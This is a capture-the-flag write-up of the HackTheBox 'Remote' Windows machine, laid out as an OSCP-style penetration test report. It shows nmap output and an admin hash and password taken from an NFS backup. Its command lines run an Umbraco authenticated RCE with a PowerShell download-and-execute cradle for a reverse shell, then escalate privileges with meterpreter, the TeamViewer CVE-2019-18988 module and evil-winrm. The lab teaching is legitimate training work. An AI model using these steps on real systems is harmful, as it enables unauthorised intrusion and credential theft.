Remote — HackTheBox Writeup OSCP Style

InfoSec Write-ups – Medium–

Remote — HackTheBox Writeup OSCP Style

Remote was an easy difficulty windows machine that featured Umbraco RCE and the famous Teamviewer’s CVE-2019–18988. Been thinking to publish an article in OSCP style, it took a while.

Offsec’s PWK Example Report:

I used the above example report for my OSCP exam report and this walkthrough will follow the same template as well.


The penetration testing portion of the assessment focuses heavily on gaining access to Remote machine. During this penetration test, Preetham was able to successfully gain access to the Remote machine.

Vulnerability Exploited: Umbraco CMS — Remote Code Execution by authenticated administrators

System Vulnerable:

Vulnerability Explanation: Umbraco CMS suffers from an authenticated remote code execution vulnerability at the xsltVisualise functionality. The credentials to the Umbraco CMS were found by mounting an NFS share which had Umbraco.sdf file which is a SQL Server Compact Edition file.



Privilege Escalation Vulnerability: Teamviewer CVE-2019–18988 Gather credentials from registry.


Vulnerability Fix: Update Teamviewer to the latest version

Severity: Critical

Information Gathering

Full Nmap Scan

Nmap scan report for
Host is up (0.74s latency).
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

There is FTP with anonymous access allowed and a Web server, RPC, SMB and NFS ports open. Preetham found NFS shares export list with showmount and mounted the site_backups share.

Umbraco.sdf file

root@kali:~/htb/boxes/remote# strings Umbraco.sdf | grep admin                                                                                               Administratoradmindefaulten-US                                                                                                                               
User "admin" <admin@htb.local> "admin" <admin@htb.local>umbraco/user/password/changepassword change

Preetham obtained admin account hash (b8be16afba8c314ad33d812f22a04991b90e2aaa)of SHA1 type.

Cracking Hash

Preetham obtained the password as baconandcheese

Remote Code Execution


Reverse Shell

Preetham used to obtain a reverse shell.


python3 -u ‘admin@htb.local’ -p ‘baconandcheese’ -i ‘' -c powershell.exe -a “IEX(New
-Object System.Net.WebClient).DownloadString(‘')"

User.txt and IP address

Privilege Escalation: Teamviewer CVE-2019–18988 Gather credentials from registry


On enumeration Preetham found Teamviewer installed on the machine.

Preetham found that the version of Teamviewer is 7 by doing the below.

Preetham obtained a meterpreter shell by executing malicious binary created by msfvenom on the machine.

Preetham ran Teamviewer MSF module and found Administrator’s password and logged in using WinRM.

Command: evil-winrm -i -u administrator -p ‘!R3m0te!’

Root.txt and ipconfig

Remote — HackTheBox Writeup OSCP Style was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

View original article on InfoSec Write-ups – Medium

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s